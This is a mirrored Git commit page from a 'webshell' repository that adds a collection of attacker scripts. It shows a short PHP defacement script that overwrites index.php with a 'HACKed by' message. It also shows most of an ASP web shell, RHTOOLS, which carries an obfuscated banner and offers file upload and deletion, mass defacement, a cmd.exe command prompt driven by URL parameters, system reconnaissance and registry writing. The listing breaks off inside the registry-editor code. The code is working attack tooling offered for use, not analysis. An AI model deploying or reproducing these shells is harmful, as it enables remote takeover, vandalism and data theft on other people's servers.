PenTest/webshell
1
0
Fork 0
mirror of https://github.com/tennc/webshell.git synced 2025-12-23 08:09:01 +00:00
Code Issues Projects Releases Wiki Activity

138shell update

Browse Source
This commit is contained in:
tennc
2013-06-05 11:18:48 +08:00
parent 895a9f205a
commit 6a88226bfd
139 changed files with 127695 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

13
138shell/T/Test.php.txt Normal file
View File

@@ -0,0 +1,13 @@
<?php
$entry_line="HACKed by EntriKa";
$fp = fopen("index.php", "w");
fputs($fp, $entry_line);
fclose($fp);
?>
<?
$fp =@fopen("index.htm", "a+");
$yazi = "test" . "\r\n";
fwrite ($fp, "$yazi");
fclose ($fp);
?>

792
138shell/T/Tool.asp.txt Normal file
View File

@@ -0,0 +1,792 @@
<%@ LANGUAGE = VBScript.Encode %>
<%
On Error Resume Next
Server.ScriptTimeOut = 7200
Class FileUploader
Public Files
Private mcolFormElem
Private Sub Class_Initialize()
Set Files = Server.CreateObject("Scripting.Dictionary")
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
End Sub
Private Sub Class_Terminate()
If IsObject(Files) Then
Files.RemoveAll()
Set Files = Nothing
End If
If IsObject(mcolFormElem) Then
mcolFormElem.RemoveAll()
Set mcolFormElem = Nothing
End If
End Sub
Public Property Get Form(sIndex)
Form = ""
If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
End Property
Public Default Sub Upload()
Dim biData, sInputName
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
Dim nPosFile, nPosBound
biData = Request.BinaryRead(Request.TotalBytes)
nPosBegin = 1
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
nDataBoundPos = InstrB(1, biData, vDataBounds)
Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
nPos = InstrB(nPos, biData, CByteString("name="))
nPosBegin = nPos + 6
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
nPosBound = InstrB(nPosEnd, biData, vDataBounds)
If nPosFile <> 0 And nPosFile < nPosBound Then
Dim oUploadFile, sFileName
Set oUploadFile = New UploadedFile
nPosBegin = nPosFile + 10
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
nPosBegin = nPos + 14
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosBegin = nPosEnd+4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
Else
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
nPosBegin = nPos + 4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
End If
nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
Loop
End Sub
Private Function CByteString(sString)
Dim nIndex
For nIndex = 1 to Len(sString)
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
Next
End Function
Private Function CWideString(bsString)
Dim nIndex
CWideString =""
For nIndex = 1 to LenB(bsString)
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
Next
End Function
End Class
Class UploadedFile
Public ContentType
Public FileName
Public FileData
Public Property Get FileSize()
FileSize = LenB(FileData)
End Property
Public Sub SaveToDisk(sPath)
Dim oFS, oFile
Dim nIndex
If sPath = "" Or FileName = "" Then Exit Sub
If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
Set oFS = Server.CreateObject("Scripting.FileSystemObject")
If Not oFS.FolderExists(sPath) Then Exit Sub
Set oFile = oFS.CreateTextFile(sPath & FileName, True)
For nIndex = 1 to LenB(FileData)
oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
Next
oFile.Close
End Sub
Public Sub SaveToDatabase(ByRef oField)
If LenB(FileData) = 0 Then Exit Sub
If IsObject(oField) Then
oField.AppendChunk FileData
End If
End Sub
End Class
key = "5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA01902E59F7273E1902E597A18C51902E59AC1E8F1902E59DE24591902E55F5B0911902E53CF70E31902E597A18C51902E5B2349FA1902E5A422FED1902E597A18C51902E5A8D389C1902E53CF70E31902E53205CA01902E5B3C4CDF1902E5A422FED1902E5BEB61221902E59DE24591902E55F5B0911902E53CF70E31902E54C98DD51902E53CF70E31902E560EB3761902E547E85261902E55AAA7E21902E55AAA7E21902E53205CA01902E5802ED5A1902E5708D0681902E5834F3241902E57B7E4AB1902E57B7E4AB1902E576CDBFC1902E581BF03F1902E53205CA01902E54C98DD51902E547E85261902E552D99691902E53205CA01902E5672BF0A1902E56BDC7B91902E5834F3241902E5659BC251902E53E873C81902E57D0E7901902E5866F8EE1902E5834F3241902E540176AD1902E53B66DFE1902E59AC1E8F1902E5AD8414B1902E5AF144301902E5BD25E3D1902E55C3AAC71902E53205CA01902E5672BF0A1902E58B2019D1902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5AA63B811902E597A18C51902E5A422FED1902E5A8D389C1902E5B554FC41902E5AD8414B1902E55AAA7E21902E5B2349FA1902E5A292D081902E59F7273E1902E597A18C51902E59AC1E8F1902E5B554FC41902E5AD8414B1902E5B2349FA1902E5640B9401902E597A18C51902E5ABF3E661902E5B554FC41902E5A422FED1902E5B3C4CDF1902E5AD8414B1902E59AC1E8F1902E5A422FED1902E597A18C51902E5A8D389C1902E547E85261902E59AC1E8F1902E5AD8414B1902E5AA63B811902E53CF70E31902E560EB3761902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E53205CA01902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E546582411902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E53CF70E31902E53205CA01902E5B554FC41902E597A18C51902E5B2349FA1902E5A102A231902E59DE24591902E5B554FC41902E55F5B0911902E53CF70E31902E594812FB1902E59931BAA1902E5A8D389C1902E597A18C51902E5ABF3E661902E5A7435B71902E53CF70E31902E560EB3761902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E55AAA7E21902E55AAA7E21902E547E85261902E55DCADAC1902E5497880B1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E560EB3761902E5|337308|1A7023"
startcode = "<html><head><title>.:: RHTOOLS 1.5 BETA(PVT) ::.</title></head><body>"
endocde = "</body></html>"
onlinehelp = "<font face=""arial"" size=""1"">.:: <a href=""http://www.rhesusfactor.cjb.net"" target=""_blank"">ONLINE HELP</a> ::.</font><br>"
Function DeCryptString(strCryptString)
Dim strRAW, arHexCharSet, i, intKey, intOffSet, strRawKey, strHexCrypData
strRawKey = Right(strCryptString, Len(strCryptString) - InStr(strCryptString, "|"))
intOffSet = Right(strRawKey, Len(strRawKey) - InStr(strRawKey,"|"))
intKey = HexConv(Left(strRawKey, InStr(strRawKey, "|") - 1)) - HexConv(intOffSet)
strHexCrypData = Left(strCryptString, Len(strCryptString) - (Len(strRawKey) + 1))
arHexCharSet = Split(strHexCrypData, Hex(intKey))
For i=0 to UBound(arHexCharSet)
strRAW = strRAW & Chr(HexConv(arHexCharSet(i))/intKey)
Next
DeCryptString = CStr(strRAW)
End Function
Function HexConv(hexVar)
Dim hxx, hxx_var, multiply
IF hexVar <> "" THEN
hexVar = UCASE(hexVar)
hexVar = StrReverse(hexVar)
DIM hx()
REDIM hx(LEN(hexVar))
hxx = 0
hxx_var = 0
FOR hxx = 1 TO LEN(hexVar)
IF multiply = "" THEN multiply = 1
hx(hxx) = mid(hexVar,hxx,1)
hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var
multiply = (multiply * 16)
NEXT
hexVar = hxx_var
HexConv = hexVar
END IF
End Function
cprthtml = "<font face='arial' size='1'>.:: RHTOOLS 1.5 BETA(PVT)&copy; BY <a href='mailto:rhfactor@antisocial.com'>RHESUS FACTOR</a> - <a href='HTTP://WWW.RHESUSFACTOR.CJB.NET' target='_blank'>HTTP://WWW.RHESUSFACTOR.CJB.NET</a> ::.</font>"
Function get_hxno(ghx)
If ghx = "A" Then
ghx = 10
ElseIf ghx = "B" Then
ghx = 11
ElseIf ghx = "C" Then
ghx = 12
ElseIf ghx = "D" Then
ghx = 13
ElseIf ghx = "E" Then
ghx = 14
ElseIf ghx = "F" Then
ghx = 15
End If
get_hxno = ghx
End Function
keydec = DeCryptString(key)
Function showobj(objpath)
showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath))
End Function
Function showobjpath(objpath)
showobjpath = Left(objpath,InstrRev(objpath,"\"))
End Function
Function checking(a,b)
If CStr(Mid(a,95,13)) <> CStr(Mid(b,95,13)) Then
pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error"
Response.Redirect(pagina)
End If
End Function
Sub hdr()
Response.Write startcode
Response.Write keydec
Response.Write "<br>"
End Sub
Sub showcontent()
Response.Write "<font face=""arial"" size=""1"">.:: <a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root"">DRIVES</a> ::.<br>.:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "<br><br></font>"
If Trim(Request.QueryString("raiz")) = "root" Then
Set fs=Server.Createobject("Scripting.FileSystemObject")
Set drivecollection=fs.drives
Response.Write "<font face=""arial"" size=""2"">"
For Each drive IN drivecollection
str=drive.driveletter & ":"
Response.Write "<b><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & str & """>" & UCase(str) & "</a></b><br>"
Select Case drive.DriveType
Case 0
tipodrive = "Unknown"
nomedrive = drive.VolumeName
Case 1
tipodrive = "Removable"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 2
tipodrive = "Fixed"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 3
tipodrive = "Network"
If drive.isready Then
nomedrive = drive.ShareName
Else
nomedrive = ""
End If
Case 4
tipodrive = "CD-Rom"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 5
tipodrive = "RAM Disk"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
End Select
response.write "<b>Tipo:</b> " & tipodrive & "<br>"
response.write "<b>Nome: </b>" & nomedrive & "<br>"
response.write "<b>Sistema de Arquivos: </b>"
If drive.isready Then
set sp=fs.getdrive(str)
response.write sp.filesystem & "<br>"
Else
response.write "-<br>"
End If
Response.Write "<b>Espa<70>o Livre: </b>"
If drive.isready Then
freespace = (drive.AvailableSpace / 1048576)
set sp=fs.getdrive(str)
response.write(Round(freespace,1) & " MB<br>")
Else
response.write("-<br>")
End If
Response.Write "<b>Espa<70>o Total: </b>"
If drive.isready Then
totalspace = (drive.TotalSize / 1048576)
set sp=fs.getdrive(str)
response.write(Round(totalspace,1) & " MB<br>")
Else
response.write("-<br>")
End If
Response.Write "<br>"
Next
Response.Write "</font>"
Set fs = Nothing
Set drivecollection = Nothing
set sp=Nothing
Else
If Trim(Request.QueryString("raiz")) = "" Then
caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
pos = Instr(caminho,"\")
pos2 = 1
While pos2 <> 0
If Instr(pos + 1,caminho,"\") <> 0 Then
pos = Instr(pos + 1,caminho,"\")
Else
pos2 = 0
End If
Wend
raiz = Left(caminho,pos)
Else
raiz = trim(Request.QueryString("raiz")) & "\"
End If
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MonRep = ObjFSO.GetFolder(raiz)
Set ColFolders = MonRep.SubFolders
Set ColFiles0 = MonRep.Files
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=test&path=" & Replace(raiz,"\","|") & "', 'win1','width=600,height=300,scrollbars=YES,resizable')"">MASS TEST IN " & UCase(raiz) & "</a></font><br><br>"
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc&path=" & Replace(raiz,"\","|") & "', 'win1','width=700,height=300,scrollbars=YES,resizable')"">MASS DEFACE IN " & UCase(raiz) & "</a></font><br><br>"
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&path=" & Replace(raiz,"\","|") & "', 'win1','width=500,height=100,scrollbars=YES,resizable')"">UPLOAD FILE TO " & UCase(raiz) & "</a></font><br><br>"
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=cmd', 'win1','width=760,height=540,scrollbars=YES,resizable')"">PROMPT</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=info', 'win1','width=760,height=450,scrollbars=YES,resizable')"">SYS INFO</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg', 'win1','width=550,height=250,scrollbars=YES,resizable')"">REGEDIT</a></font><br><br>"
Response.Write "<font face='arial'><b>Root Folder: " & raiz & "</b></font><br><br>"
If CInt(Len(raiz) - 1) <> 2 Then
barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
backlevel = Left(raiz,barrapos)
Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & backlevel & "'> . . </font></b></a><br>"
Else
Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root'> . .&nbsp;</font></b></a><br>"
End If
Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
for each folderItem in ColFolders
Response.Write "<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & folderItem.path & "'>" & showobj(folderItem.path) & "</a></b></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=250,scrollbars=YES,resizable')"">&lt;&lt; PUT</a></font></td></tr>"
next
Response.Write "</table><br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
marcatabela = true
for each FilesItem0 in ColFiles0
If marcatabela = true then
corfundotabela = " bgcolor=""#EEEEEE"""
Else
corfundotabela = ""
End If
Response.Write "<tr><td" & corfundotabela & "><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'" & corfundotabela & "><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=get&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.GET.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=ren&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.REN.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=del&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.DEL.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtview&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=640,height=480,scrollbars=YES,resizable')"">o.VIEW.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=760,height=520,scrollbars=YES,resizable')"">o.EDIT.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=download&file=" & Replace(FilesItem0.path,"\","|") & """>o.DOWNLOAD.o</a></font></td></tr>"
marcatabela = NOT marcatabela
next
Response.Write "</table>"
End If
End Sub
Select Case Trim(Request.QueryString("action"))
Case "get"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
MyFile.Copy (destino)
If Err.Number = 0 Then
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>copiado para: " & destino
End If
Case "put"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
If Trim(Request.QueryString("arquivo")) = "" Then
caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
varpath = Trim(Request.QueryString("path"))
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MonRep = ObjFSO.GetFolder(caminho)
Set ColFolders = MonRep.SubFolders
Set ColFiles0 = MonRep.Files
Response.Write "<font face='arial' size='2'><b>Selecione o arquivo: <br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
for each FilesItem0 in ColFiles0
Response.Write "<tr><td><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & varpath & "&arquivo=" & Replace(FilesItem0.path,"\","|") & """>:: SELECIONAR ::</a></font></td></tr>"
next
Response.Write "</table>"
Else
destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\"
arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(arquivo)
MyFile.Copy (destino)
If Err.Number = 0 Then
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & arquivo & "</b><br>copiado para: <b>" & destino
End If
End If
Case "del"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
MyFile.Delete
If Err.Number = 0 Then
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo <b>" & caminho & "</b> apagado<br>"
End If
Case "ren"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
If Trim(Request.QueryString("status")) <> "2" Then
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
arquivo = showobj(caminho)
Response.Write "<br><font face=""arial"" size=""2""><b>" & arquivo & "</b><br>" & _
"<form action=""" & Request.ServerVariables("SCRIPT_NAME") & """ method=""get"">" & _
"<input type=""hidden"" name=""action"" value=""ren"">" & _
"<input type=""hidden"" name=""status"" value=""2"">" & _
"<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>" & _
"Digite o novo nome: <input type=""text"" name=""newname"">" & _
"&nbsp;&nbsp;<input type=""submit"" value=""alterar"">" & _
"</form>"
Else
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname"))
MyFile.Move (destino)
If Err.Number = 0 Then
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>renomeado para<b>: " & destino
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
End If
End If
Case "error"
Response.Write "<center><font face='arial' size='2' color='red'> <b>C<>DIGO CORROMPIDO<BR>CORRUPT CODE</font></center>"
Case "cmd"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.QueryString(".CMD")
If (szCMD <> "") Then
szTempFile = "c:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET""><input type=""hidden"" name=""action"" value=""cmd""><input type=text name="".CMD"" size=45 value=""" & szCMD & """><input type=submit value=""Run""></FORM><br><br> "
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write "<font face=""arial"">"
Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
Case "info"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set WshNetwork = Server.CreateObject("WScript.Network")
Set WshShell = Server.CreateObject("WScript.Shell")
Set WshEnv = WshShell.Environment("SYSTEM")
Response.Write "<br><font face=arial size=2>"
Response.Write "<b>IDENTIFICA<43><41>O DE REDE:</b><br>"
Response.Write "<b>Usu<73>rio: </b>" & WshNetwork.UserName & "<br>"
Response.Write "<b>Nome do Computador: </b>" & WshNetwork.ComputerName & "<br>"
Response.Write "<b>Usu<73>rio do Dom<6F>nio: </b>" & WshNetwork.UserDomain & "<br>"
Set Drives = WshNetwork.EnumNetworkDrives
For i = 0 to Drives.Count - 1
Response.Write "<b>Drive de Rede (Mapeado): </b>" & Drives.Item(i) & "<br>"
Next
Response.Write "<br><b>F<>SICO:</b><br>"
Response.Write "<b>Arquitetura do Processador: </b>" & WshEnv("PROCESSOR_ARCHITECTURE") & "<br>"
Response.Write "<b>N<>mero de Processadores: </b>" & WshEnv("NUMBER_OF_PROCESSORS") & "<br>"
Response.Write "<b>Identificador do Processador: </b>" & WshEnv("PROCESSOR_IDENTIFIER") & "<br>"
Response.Write "<b>N<>vel do Processador: </b>" & WshEnv("PROCESSOR_LEVEL") & "<br>"
Response.Write "<b>Revis<69>o do Processador: </b>" & WshEnv("PROCESSOR_REVISION") & "<br>"
Response.Write "<br><b>L<>GICO:</b><br>"
Response.Write "<b>IP: </b>" & request.servervariables("LOCAL_ADDR") & "<br>"
Response.Write "<b>Sistema Operacional: </b>" & WshEnv("OS") & "<br>"
Response.Write "<b>Servidor Web: </b>" & request.servervariables("SERVER_SOFTWARE") & "<br>"
Response.Write "<b>Especifica<63><61>o do Command: </b>" & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "<br>"
Response.Write "<b>Caminhos no Path: </b>" & WshEnv("PATH") & "<br>"
Response.Write "<b>Execut<75>veis: </b>" & WshEnv("PATHEXT") & "<br>"
Response.Write "<b>Prompt: </b> " & WshEnv("PROMPT") & "<br>"
Response.Write "<b>System Drive: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "<br>"
Response.Write "<b>System Root: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "<br>"
Response.Write "<b>Caminho do System32: </b>" & WshShell.CurrentDirectory & "<br>"
Set Drives = Nothing
Set WshNetwork = Nothing
Set WshShell = Nothing
Set WshEnv = Nothing
Case "reg"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set WshShell = Server.CreateObject("WScript.Shell")
Response.Write "<font face=""arial"" size=""2""><b>Editor de Registro:</b><br><br>"
Select Case Trim(Request.QueryString("regaction"))
Case "w"
If Trim(Request.QueryString("process")) = "yes" Then
Select Case Trim(Request.QueryString("type"))
Case "1"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ")
Case "2"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD")
Case "3"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY")
Case "4"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ")
Case "5"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ")
End Select
Response.Write "<center><br><font face=""arial"" size=""2"">Registro <b>"
Response.Write Trim(Request.QueryString("key")) & "</b> Escrito</center>"
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
Else
Response.Write "<table><tr><td><font face=""arial"" size=""2"">ROOT KEY NAME</td><td><font face=""arial"" size=""2"">ABREVIA<49><41>O</td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_USER </td><td><font face=""arial"" size=""1""> HKCU </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_LOCAL_MACHINE </td><td><font face=""arial"" size=""1""> HKLM </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CLASSES_ROOT </td><td><font face=""arial"" size=""1""> HKCR </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_USERS </td><td><font face=""arial"" size=""1""> HKEY_USERS </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_CONFIG </td><td><font face=""arial"" size=""1""> HKEY_CURRENT_CONFIG </td></tr></table><br>"
Response.Write "<table><tr><td><font face=""arial"" size=""2"">Tipo </td><td><font face=""arial"" size=""2""> Descri<72><69>o </td><td><font face=""arial"" size=""2""> Na forma de </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_SZ </td><td><font face=""arial"" size=""1""> string </td><td><font face=""arial"" size=""1""> string </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_DWORD </td><td><font face=""arial"" size=""1""> n<>mero </td><td><font face=""arial"" size=""1""> inteiro </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_BINARY </td><td><font face=""arial"" size=""1""> valor bin<69>rio </td><td><font face=""arial"" size=""1""> VBArray de inteiros </td></tr>"
